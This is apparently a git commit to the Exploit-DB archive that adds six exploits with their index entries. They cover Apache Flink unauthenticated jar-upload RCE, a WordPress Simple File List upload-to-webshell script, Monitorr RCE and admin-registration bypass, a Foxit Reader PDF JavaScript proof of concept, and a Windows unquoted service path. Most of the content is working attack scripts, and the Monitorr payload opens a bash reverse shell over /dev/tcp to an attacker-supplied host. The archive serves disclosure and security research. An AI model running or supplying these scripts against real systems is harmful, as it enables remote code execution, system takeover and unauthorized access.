From 3cad5bf9ad417175e12cb1556824cfaf763a2ac6 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Tue, 3 Nov 2020 05:02:04 +0000 Subject: [PATCH] DB: 2020-11-03 6 changes to exploits/shellcodes Foxit Reader 9.7.1 - Remote Command Execution (Javascript API) Quick N Easy FTP Service 3.2 - Unquoted Service Path Apache Flink 1.9.x - File Upload RCE (Unauthenticated) WordPress Plugin Simple File List 5.4 - Arbitrary File Upload Monitorr 1.7.6m - Remote Code Execution (Unauthenticated) Monitorr 1.7.6m - Authorization Bypass --- exploits/java/webapps/48978.py | 139 +++++++++++++++++++++++++++++++ exploits/php/webapps/48979.py | 99 ++++++++++++++++++++++ exploits/php/webapps/48980.py | 29 +++++++ exploits/php/webapps/48981.py | 25 ++++++ exploits/windows/local/48982.pdf | 139 +++++++++++++++++++++++++++++++ exploits/windows/local/48983.txt | 31 +++++++ files_exploits.csv | 6 ++ 7 files changed, 468 insertions(+) create mode 100755 exploits/java/webapps/48978.py create mode 100755 exploits/php/webapps/48979.py create mode 100755 exploits/php/webapps/48980.py create mode 100755 exploits/php/webapps/48981.py create mode 100644 exploits/windows/local/48982.pdf create mode 100644 exploits/windows/local/48983.txt diff --git a/exploits/java/webapps/48978.py b/exploits/java/webapps/48978.py new file mode 100755 index 000000000..70c8bd635 --- /dev/null +++ b/exploits/java/webapps/48978.py @@ -0,0 +1,139 @@ +#!/usr/bin/env python3 +# _*_ coding: utf-8 _*_ + +# Exploit Title: Apache Flink 1.9.x - File Upload RCE (Unauthenticated) +# Google Dork: None +# Date: 2020.11.01 +# Exploit Author: bigger.wing +# Vendor Homepage: https://flink.apache.org/ +# Software Link: https://flink.apache.org/downloads.html +# Version: 1.9.x +# Tested on: Centos7.x, 1.9.1 +# CVE: None + +import io +import re +import sys +import base64 +import requests + + +class FlinkRCECheck: + + def __init__(self, url): + self.url = url + self.timeout = 10 + self.upload_file = 'rce_check_from_sec.jar' + self.headers = { + 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) ' + 'Chrome/61.0 Safari/537.36' + } + + @property + def get_version(self): + url = '%s/%s' % (self.url, 'config') + try: + res = requests.get(url, headers=self.headers, timeout=self.timeout, verify=False) + version = res.json().get('flink-version') + except: + version = 'unknown' + return version + + @property + def jar_check(self): + url = '%s/%s' % (self.url, 'jars') + jar_list = [] + try: + res = requests.get(url, headers=self.headers, verify=False, timeout=self.timeout) + if res.status_code == 200 and 'application/json' in res.headers.get('Content-Type', ''): + res = res.json() + for file in res['files']: + if file['id'].endswith(self.upload_file): + jar_list.append(file['id']) + except Exception as e: + pass + + return jar_list + + @property + def jar_upload(self): + url = '%s/%s' % (self.url, 'jars/upload') + jar_content = base64.b64decode('UEsDBBQACAgIACJ1bU8AAAAAAAAAAAAAAAAUAAQATUVUQS1JTkYvTUFOSUZFU1QuTUb+ygAA803My' + '0xLLS7RDUstKs7Mz7NSMNQz4OXyTczM03XOSSwutlJwrUhNLi1J5eXi5QIAUEsHCIiKCL8wAAAALg' + 'AAAFBLAwQKAAAIAAAidW1PAAAAAAAAAAAAAAAACQAAAE1FVEEtSU5GL1BLAwQUAAgICAAidW1PAAA' + 'AAAAAAAAAAAAADQAAAEV4ZWN1dGUuY2xhc3ONVet2E1UU/k4yyUwmQy+TQlsQBdSStqSxiIotIlAK' + 'VkJbSa0G8DKZHpPTJjNhLjTVCvoQ/ugT8MsfqCtx0aUPwEOx3Gdo09KGtUzW7H3O3vvbt7PPzPMXz' + '/4FMIlfdbyDyxo+1XBFx1Vc05HCjIbrks+quKHipobPNMzp0PC5hlsqChpu6+jBvCQLGhal6gsVd3' + 'QUsaRjAF9qWJb8K0m+lqQkyd0URbin4r6OkzLoN5J/K8l3Or6HpaKswmZIXhKOCC4zxLOjywzKjLv' + 'CGXoLwuHzYb3MvSWrXCOJWXBtq7ZseULud4RKUBU+Q6ow2+R2GPBpEtUt4TAcy94rrFoPrXzNcir5' + 'YuAJpzItA7AGw/F9qkXPtbnvXwtFbYV75CDeCDZkuENo8m15FQqX6eKaHLuEtesrtJI2h0NIG7ujC' + 'QNRyxdty3GiqPps0+aNQLiOr4J86EU39Gx+Q8gyjZ3yJiTSwLsYYQCD6voTjlXnKriBH1AxUIWgJN' + 'aFY2AVawxDr6uToe9gCeSPsp/gTQoYy9syTI5k+bJw8n6VkogAws2/zCkVKcqWX5WWNQN1UNtjOQK' + '6oB73H6pSxQMDHnxpH5Dp/asGQjw0sA7KtwlhYAMjBn7ETwyDB9PrJB7fvLJpYBM/G3gEoeKxgV9Q' + 'o0x3mvRKaQvlVW5TsMyeqNPoV3uw4Qe8zpCu8IBa1eCenIKRbJch6nb46cAtuOvcm7F8SmAg29VIs' + '10noOmk8Tix3/FM1fKK/EHIHZtPj95lONotLM1ukjeFH/jRXSGzhB9YXiDNR7tOW/8hIUMP1TfnNM' + 'KA3HKLCh7cBdPJ7lMQfCjbVSETMUKfX+c1UReBPJKzr2/TgTFXq5Y/z5uUtOJELGHXXNmyuBvKSjo' + 'RF8nJXipJq9HgDl2L3P86kL3LrAXu7nRnurim+A25w2m8Te9G+YvRxaILRvQs7fLE6a4hMdYGexqp' + 's0STkZBhlKjx0gBjGCeewjnkyIrAbInskiT7y4wVxuLnb5vxv6G0kDCTLahbOLUNrZT8B6lS3NSLJ' + 'cVMF0uJc8U2jPknuGAemVK20VMye9voa6F/C6rZK0W7mGFFYswOJtdCRuoHSsMU5Ggbx8zBFoamEs' + 'OJFoa3kJb8+BMo4wW5OvEH3tjGyVIbb5pvtXBqnJ5o0cLpFs7s1fohjhCN01+BSvUMEr1AdV6Ejpt' + 'I4xbpOXqxhj66kP34DSb+RCbqzR36WEwScoIaGSdEDu/RXpE9wXm8H/l9St4m5dsMv+MDWsXI28IO' + 'Yg1zFP8jQjwifhEfU5+nCKWQ/TQ9l6IsP/kPUEsHCEEOnKXWAwAA4gYAAFBLAQIUABQACAgIACJ1b' + 'U+Iigi/MAAAAC4AAAAUAAQAAAAAAAAAAAAAAAAAAABNRVRBLUlORi9NQU5JRkVTVC5NRv7KAABQSw' + 'ECCgAKAAAIAAAidW1PAAAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAB2AAAATUVUQS1JTkYvUEsBAhQ' + 'AFAAICAgAInVtT0EOnKXWAwAA4gYAAA0AAAAAAAAAAAAAAAAAnQAAAEV4ZWN1dGUuY2xhc3NQSwUG' + 'AAAAAAMAAwC4AAAArgQAAAAA') + files = {'jarfile': (self.upload_file, io.BytesIO(jar_content), 'application/octet-stream')} + + try: + res = requests.post(url, headers=self.headers, files=files, timeout=self.timeout, verify=False) + file_id = res.json()['filename'].split('/')[-1] + return file_id + except Exception as e: + res = False + return res + + @property + # delete history jar packages + def jar_delete(self): + for jar_name in self.jar_check: + url = '%s//jars/%s' % (self.url, jar_name) + try: + requests.delete(url=url, headers=self.headers, timeout=self.timeout, verify=False) + except: + pass + return + + def rce(self, command): + jar_file = self.jar_upload + try: + execute_cmd_url = '%s/jars/%s/run?entry-class=Execute&program-args="%s"' % (self.url, jar_file, command) + res = requests.post(url=execute_cmd_url, headers=self.headers, timeout=self.timeout, verify=False) + res = re.findall('\|@\|(.*?)\|@\|', res.text)[0][0:-2] + if res: + print('rce command "%s" exec result: %s' % (command, res)) + state = 1 + msg = '%s rce success' % self.url + else: + state = 0 + msg = '%s rce failed' % self.url + except: + state = 0 + msg = '%s rce failed' % self.url + + delete = self.jar_delete + + return {'state': state, 'version': self.get_version, 'msg': msg} + + +if __name__ == '__main__': + usage = 'python3 script.py ip port command' + if len(sys.argv) != 4: + print('simple usage: %s' % usage) + else: + ip = sys.argv[1] + port = sys.argv[2] + command = sys.argv[3] + url = 'http://%s:%s' % (ip, port) + res = FlinkRCECheck(url=url).rce(command=command) + print(res) \ No newline at end of file diff --git a/exploits/php/webapps/48979.py b/exploits/php/webapps/48979.py new file mode 100755 index 000000000..6381bf6f5 --- /dev/null +++ b/exploits/php/webapps/48979.py @@ -0,0 +1,99 @@ +#!/usr/bin/python +# -*- coding: utf-8 -*- +# Exploit Title: Wordpress Plugin Simple File List 5.4 - Arbitrary File Upload +# Date: 2020-11-01 +# Exploit Author: H4rk3nz0 based off exploit by coiffeur +# Original Exploit: https://www.exploit-db.com/exploits/48349 +# Vendor Homepage: https://simplefilelist.com/ +# Software Link: https://wordpress.org/plugins/simple-file-list/  +# Version: Wordpress v5.4 Simple File List v4.2.2  + +import requests +import random +import hashlib +import sys +import os +import urllib3 +urllib3.disable_warnings() + +dir_path = '/wp-content/uploads/simple-file-list/' +upload_path = '/wp-content/plugins/simple-file-list/ee-upload-engine.php' +move_path = '/wp-content/plugins/simple-file-list/ee-file-engine.php' +file_name = raw_input('[*] Enter File Name (working directory): ') +protocol = raw_input('[*] Enter protocol (http/https): ') +http = protocol + '://' + +def usage(): + banner =""" +USAGE: python simple-file-list-upload.py +NOTES: Append :port to IP if required. + Advise the usage of a webshell as payload. Reverseshell payloads can be hit or miss. + """ + print (banner) + + +def file_select(): + filename = file_name.split(".")[0]+'.png' + with open(file_name) as f: + with open(filename, 'w+') as f1: + for line in f: + f1.write(line) + print ('[+] File renamed to ' + filename) + return filename + + +def upload(url, filename): + files = {'file': (filename, open(filename, 'rb'), 'image/png')} + datas = { + 'eeSFL_ID': 1, + 'eeSFL_FileUploadDir': dir_path, + 'eeSFL_Timestamp': 1587258885, + 'eeSFL_Token': 'ba288252629a5399759b6fde1e205bc2', + } + r = requests.post(url=http + url + upload_path, data=datas, + files=files, verify=False) + r = requests.get(url=http + url + dir_path + filename, verify=False) + if r.status_code == 200: + print ('[+] File uploaded at ' + http + url + dir_path + filename) + os.remove(filename) + else: + print ('[-] Failed to upload ' + filename) + exit(-1) + return filename + + +def move(url, filename): + new_filename = filename.split(".")[0]+'.php' + headers = {'Referer': http + url + '/wp-admin/admin.php?page=ee-simple-file-list&tab=file_list&eeListID=1', + 'X-Requested-With': 'XMLHttpRequest'} + datas = { + 'eeSFL_ID': 1, + 'eeFileOld': filename, + 'eeListFolder': '/', + 'eeFileAction': 'Rename|'+ new_filename, + } + r = requests.post(url= http + url + move_path, data=datas, + headers=headers, verify=False) + if r.status_code == 200: + print ('[+] File moved to ' + http + url + dir_path + new_filename) + else: + print ('[-] Failed to move ' + filename) + exit(-1) + return new_filename + + +def main(url): + file_to_upload = file_select() + uploaded_file = upload(url, file_to_upload) + moved_file = move(url, uploaded_file) + if moved_file: + print ('[^-^] Exploit seems to have worked...') + print ('\tURL: ' + http + url + dir_path + moved_file) + + +if __name__ == '__main__': + if len(sys.argv) < 2: + usage() + exit(-1) + + main(sys.argv[1]) \ No newline at end of file diff --git a/exploits/php/webapps/48980.py b/exploits/php/webapps/48980.py new file mode 100755 index 000000000..ea35ed5b6 --- /dev/null +++ b/exploits/php/webapps/48980.py @@ -0,0 +1,29 @@ +#!/usr/bin/python +# -*- coding: UTF-8 -*- + +# Exploit Title: Monitorr 1.7.6m - Remote Code Execution (Unauthenticated) +# Date: September 12, 2020 +# Exploit Author: Lyhin's Lab +# Detailed Bug Description: https://lyhinslab.org/index.php/2020/09/12/how-the-white-box-hacking-works-authorization-bypass-and-remote-code-execution-in-monitorr-1-7-6/ +# Software Link: https://github.com/Monitorr/Monitorr +# Version: 1.7.6m +# Tested on: Ubuntu 19 + +import requests +import os +import sys + +if len (sys.argv) != 4: + print ("specify params in format: python " + sys.argv[0] + " target_url lhost lport") +else: + url = sys.argv[1] + "/assets/php/upload.php" + headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0", "Accept": "text/plain, */*; q=0.01", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "X-Requested-With": "XMLHttpRequest", "Content-Type": "multipart/form-data; boundary=---------------------------31046105003900160576454225745", "Origin": sys.argv[1], "Connection": "close", "Referer": sys.argv[1]} + + data = "-----------------------------31046105003900160576454225745\r\nContent-Disposition: form-data; name=\"fileToUpload\"; filename=\"she_ll.php\"\r\nContent-Type: image/gif\r\n\r\nGIF89a213213123& /dev/tcp/"+sys.argv[2] +"/" + sys.argv[3] + " 0>&1'\");\r\n\r\n-----------------------------31046105003900160576454225745--\r\n" + + requests.post(url, headers=headers, data=data) + + print ("A shell script should be uploaded. Now we try to execute it") + url = sys.argv[1] + "/assets/data/usrimg/she_ll.php" + headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Connection": "close", "Upgrade-Insecure-Requests": "1"} + requests.get(url, headers=headers) \ No newline at end of file diff --git a/exploits/php/webapps/48981.py b/exploits/php/webapps/48981.py new file mode 100755 index 000000000..13f65e7ba --- /dev/null +++ b/exploits/php/webapps/48981.py @@ -0,0 +1,25 @@ +#!/usr/bin/python +# -*- coding: UTF-8 -*- + +# Exploit Title: Monitorr 1.7.6m - Authorization Bypass +# Date: September 12, 2020 +# Exploit Author: Lyhin's Lab +# Detailed Bug Description: https://lyhinslab.org/index.php/2020/09/12/how-the-white-box-hacking-works-authorization-bypass-and-remote-code-execution-in-monitorr-1-7-6/ +# Software Link: https://github.com/Monitorr/Monitorr +# Version: 1.7.6m +# Tested on: Ubuntu 19 + +# Monitorr 1.7.6m allows creation of administrative accounts by abusing the installation URL. + +import requests +import os +import sys + +if len (sys.argv) != 5: + print ("specify params in format: python " + sys.argv[0] + " target_url user_login user_email user_password") +else: + url = sys.argv[1] + "/assets/config/_installation/_register.php?action=register" + headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded", "Origin": url, "Connection": "close", "Referer": url, "Upgrade-Insecure-Requests": "1"} + data = {"user_name": sys.argv[2], "user_email": sys.argv[3], "user_password_new": sys.argv[4], "user_password_repeat": sys.argv[4], "register": "Register"} + requests.post(url, headers=headers, data=data) + print ("Done.") \ No newline at end of file diff --git a/exploits/windows/local/48982.pdf b/exploits/windows/local/48982.pdf new file mode 100644 index 000000000..5333f43b1 --- /dev/null +++ b/exploits/windows/local/48982.pdf @@ -0,0 +1,139 @@ +# Exploit Title: Foxit Reader 9.7.1 - Remote Command Execution (Javascript API) +# Exploit Author: Nassim Asrir +# Vendor Homepage: https://www.foxitsoftware.com/ +# Description: Foxit Reader before 10.0 allows Remote Command Execution via the unsafe app.opencPDFWebPage JavaScript API which allows an attacker to execute local files on the file system and bypass the security dialog. + +The exploit process need the user-interaction (Opening the PDF) . + ++ Process continuation + +#POC + +%PDF-1.4 +%ÓôÌá +1 0 obj +<< +/CreationDate(D:20200821171007+02'00') +/Title(Hi, Can you see me ?) +/Creator(AnonymousUser) +>> +endobj +2 0 obj +<< +/Type/Catalog +/Pages 3 0 R +/Names +<< +/JavaScript 10 0 R +>> +>> +endobj +3 0 obj +<< +/Type/Pages +/Count 1 +/Kids[4 0 R] +>> +endobj +4 0 obj +<< +/Type/Page +/MediaBox[0 0 595 842] +/Parent 3 0 R +/Contents 5 0 R +/Resources +<< +/ProcSet [/PDF/Text/ImageB/ImageC/ImageI] +/ExtGState +<< +/GS0 6 0 R +>> +/Font +<< +/F0 8 0 R +>> +>> +/Group +<< +/CS/DeviceRGB +/S/Transparency +/I false +/K false +>> +>> +endobj +5 0 obj +<< +/Length 94 +/Filter/FlateDecode +>> +stream +xœŠ»@@EûùŠ[RØk ­x•ÄüW"DDç덜âžÜœ›b°ý“{‡éTg†¼tS)dÛ‘±=dœþ+9Ÿ_ÄifÔ ÈŒ [ŽãB_5!d§ZhP>¯ ‰ +endstream +endobj +6 0 obj +<< +/Type/ExtGState +/ca 1 +>> +endobj +7 0 obj +<< +/Type/FontDescriptor +/Ascent 833 +/CapHeight 592 +/Descent -300 +/Flags 32 +/FontBBox[-192 -710 702 1221] +/ItalicAngle 0 +/StemV 0 +/XHeight 443 +/FontName/CourierNew,Bold +>> +endobj +8 0 obj +<< +/Type/Font +/Subtype/TrueType +/BaseFont/CourierNew,Bold +/Encoding/WinAnsiEncoding +/FontDescriptor 7 0 R +/FirstChar 0 +/LastChar 255 +/Widths[600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600] +>> +endobj +9 0 obj +<< +/S/JavaScript +/JS(app.opencPDFWebPage\('C:\\\\Windows\\\\System32\\\\calc.exe'\) ) +>> +endobj +10 0 obj +<< +/Names[(EmbeddedJS)9 0 R] +>> +endobj +xref +0 11 +0000000000 65535 f +0000000015 00000 n +0000000170 00000 n +0000000250 00000 n +0000000305 00000 n +0000000560 00000 n +0000000724 00000 n +0000000767 00000 n +0000000953 00000 n +0000002137 00000 n +0000002235 00000 n +trailer +<< +/ID[<7018DE6859F23E419162D213F5C4D583><7018DE6859F23E419162D213F5C4D583>] +/Info 1 0 R +/Root 2 0 R +/Size 11 +>> +startxref +2283 +%%EOF \ No newline at end of file diff --git a/exploits/windows/local/48983.txt b/exploits/windows/local/48983.txt new file mode 100644 index 000000000..11c17de12 --- /dev/null +++ b/exploits/windows/local/48983.txt @@ -0,0 +1,31 @@ +# Exploit Title: Quick 'n Easy FTP Service 3.2 - Unquoted Service Path +# Discovery by: yunaranyancat +# Discovery Date: October 2020 +# Vendor Homepage: https://www.pablosoftwaresolutions.com/html/quick__n_easy_ftp_service.html +# Software Link : www.pablosoftwaresolutions.com/download.php?id=10 +# Tested Version: 3.2 +# Vulnerability Type: Unquoted Service Path +# Tested on OS: Windows 7 + +# Vulnerability discovery: + +Registry value : HKLM\SYSTEM\ControlSet001\Services\Quick 'n Easy FTP Service + +# Service info: + +C:\>sc qc "Quick 'n Easy FTP Service" +[SC] QueryServiceConfig SUCCESS + +SERVICE_NAME: Quick 'n Easy FTP Service + TYPE : 10 WIN32_OWN_PROCESS + START_TYPE : 2 AUTO_START + ERROR_CONTROL : 1 Normal + BINARY_PATH_NAME : C:\Program Files (x86)\Quick 'n Easy FTP Service\ftpservice.exe + LOAD_ORDER_GROUP : + TAG : 0 + DISPLAY_NAME : Quick 'n Easy FTP Service + DEPENDENCIES : + SERVICE_START_NAME : LocalSystem + +# Exploit: +This vulnerability could permit executing code during startup or reboot with the escalated privileges. \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 59bcaf612..7c8f43cbd 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -10397,6 +10397,8 @@ id,file,description,date,author,type,platform,port 48966,exploits/windows/local/48966.txt,"Program Access Controller v1.2.0.0 - 'PACService.exe' Unquoted Service Path",2020-10-28,"Mohammed Alshehri",local,windows, 48967,exploits/windows/local/48967.txt,"Prey 1.9.6 - _CronService_ Unquoted Service Path",2020-10-28,"Ömer Tuygun",local,windows, 48968,exploits/windows/local/48968.txt,"IP Watcher v3.0.0.30 - 'PACService.exe' Unquoted Service Path",2020-10-28,"Mohammed Alshehri",local,windows, +48982,exploits/windows/local/48982.pdf,"Foxit Reader 9.7.1 - Remote Command Execution (Javascript API)",2020-11-02,"Nassim Asrir",local,windows, +48983,exploits/windows/local/48983.txt,"Quick N Easy FTP Service 3.2 - Unquoted Service Path",2020-11-02,yunaranyancat,local,windows, 42887,exploits/linux/local/42887.c,"Linux Kernel 3.10.0-514.21.2.el7.x86_64 / 3.10.0-514.26.1.el7.x86_64 (CentOS 7) - SUID Position Independent Executable 'PIE' Local Privilege Escalation",2017-09-26,"Qualys Corporation",local,linux, 42890,exploits/windows/local/42890.txt,"Trend Micro OfficeScan 11.0/XG (12.0) - Image File Execution Bypass",2017-09-28,hyp3rlinx,local,windows, 42918,exploits/windows/local/42918.py,"DiskBoss Enterprise 8.4.16 - 'Import Command' Local Buffer Overflow",2017-09-28,"Touhid M.Shaikh",local,windows, @@ -40796,6 +40798,10 @@ id,file,description,date,author,type,platform,port 48975,exploits/multiple/webapps/48975.py,"Citadel WebCit < 926 - Session Hijacking Exploit",2020-10-30,"Simone Quatrini",webapps,multiple, 48976,exploits/php/webapps/48976.txt,"Online Job Portal 1.0 - 'userid' SQL Injection",2020-10-30,"Akıner Kısa",webapps,php, 48977,exploits/php/webapps/48977.py,"Simple College Website 1.0 - 'username' SQL Injection / Remote Code Execution",2020-10-30,yunaranyancat,webapps,php, +48978,exploits/java/webapps/48978.py,"Apache Flink 1.9.x - File Upload RCE (Unauthenticated)",2020-11-02,bigger.wing,webapps,java, +48979,exploits/php/webapps/48979.py,"WordPress Plugin Simple File List 5.4 - Arbitrary File Upload",2020-11-02,H4rk3nz0,webapps,php, +48980,exploits/php/webapps/48980.py,"Monitorr 1.7.6m - Remote Code Execution (Unauthenticated)",2020-11-02,"Lyhin\'s Lab",webapps,php, +48981,exploits/php/webapps/48981.py,"Monitorr 1.7.6m - Authorization Bypass",2020-11-02,"Lyhin\'s Lab",webapps,php, 42884,exploits/multiple/webapps/42884.py,"Fibaro Home Center 2 - Remote Command Execution / Privilege Escalation",2017-02-22,forsec,webapps,multiple, 42805,exploits/php/webapps/42805.txt,"WordPress Plugin WPAMS - SQL Injection",2017-09-26,"Ihsan Sencan",webapps,php, 42889,exploits/php/webapps/42889.txt,"Trend Micro OfficeScan 11.0/XG (12.0) - Private Key Disclosure",2017-09-28,hyp3rlinx,webapps,php,